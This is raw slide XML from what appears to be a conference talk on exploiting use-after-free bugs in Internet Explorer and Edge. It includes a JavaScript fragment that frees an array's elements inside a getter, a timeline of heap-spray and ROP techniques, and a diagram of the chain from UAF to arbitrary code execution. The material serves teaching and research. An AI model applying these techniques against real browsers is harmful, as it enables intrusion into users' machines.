              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>for (let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0;i&lt;cnt-1;i++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>] = {		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key0: 0x00000002,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key1: 0x00000004,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key2: 0x00000006,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key3: 0x00000008,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key4: 0x0000000a,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key5: 0x0000000c,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key6: 0x0000000e,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    	key7: 0x00000010,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 	key8: 0x00000012,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	key9: 0x00000014,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>keya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 0x00000016,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>keyb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 0x00000018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>obj_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>defineGetter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>__(cnt-1, 	 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>function(){			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pre_arr.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0;		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>obj_arr.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> = 0;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Free all elements in the array of objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C057BBE-977F-46C9-9B5C-08E826C0BA2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2534402"/>
            <a:ext cx="6956584" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>According to a large number of allocation experiments</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675467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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444501" y="2595482"/>
            <a:ext cx="11047428" cy="3847207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nop</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Stack overflow 		       2008		         IE6/7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ ROP/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>module without ASLR	       2009-2010	         IE8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM object Element pointer 		       2013-2014	         IE10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array object 				       2014-2015	         IE11/Edge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944880" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The implementation from UAF to arbitrary code execution is as follows</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="is-IS" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="944987" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{778F258D-6D4F-42EA-A5B8-1AEFA4C10CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1156629" y="6815038"/>
            <a:ext cx="10874951" cy="2403014"/>
            <a:chOff x="3185997" y="9535608"/>
            <a:chExt cx="16739986" cy="3698998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A76377A-3DBC-48C8-95A5-5A7081E1C741}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3185997" y="10858604"/>
              <a:ext cx="2240997" cy="110699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4000" dirty="0">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="dk1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>UAF</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="400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5" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B270DE6-CF73-4638-9ED9-120C49719741}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7908374" y="9535608"/>
              <a:ext cx="2240997" cy="3698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Relative</a:t>
              </a:r>
              <a:r>
                <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rPr>
                <a:t> </a:t>
              </a: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Address</a:t>
              </a:r>
              <a:r>
                <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rPr>
                <a:t> </a:t>
              </a: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Read/Write</a:t>
              </a:r>
              <a:endPar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6" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A6649C-700F-48FB-8490-C9B59537E1C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12630749" y="9535608"/>
              <a:ext cx="2481379" cy="369899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Arbitrary</a:t>
              </a:r>
              <a:r>
                <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rPr>
                <a:t> </a:t>
              </a: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Address</a:t>
              </a:r>
            </a:p>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Read/Write</a:t>
              </a:r>
              <a:endPar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8899FCF2-1FB3-403B-BAC6-38A7CD8D9FF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17353128" y="9535609"/>
              <a:ext cx="2572855" cy="369899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Arbitrary</a:t>
              </a:r>
            </a:p>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Code</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:sysClr val="windowText" lastClr="000000"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="dk1">
                        <a:alpha val="40000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>Execute</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:ln w="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="直线箭头连接符 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7072204E-3255-40EC-A71A-5CE30210A6C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="14" idx="3"/>
              <a:endCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5426994" y="11385107"/>
              <a:ext cx="2481379" cy="2699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9" name="直线箭头连接符 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A95B46-0B89-4B73-869E-E293F43F3081}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10149371" y="11389600"/>
              <a:ext cx="2481379"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20" name="直线箭头连接符 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1C0124-DC05-443D-916E-BAEA26C2FFFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="16" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
